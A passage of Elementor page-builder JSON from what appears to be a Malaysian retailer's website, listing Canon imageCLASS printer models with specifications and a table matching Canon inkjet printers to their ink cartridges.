:-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td 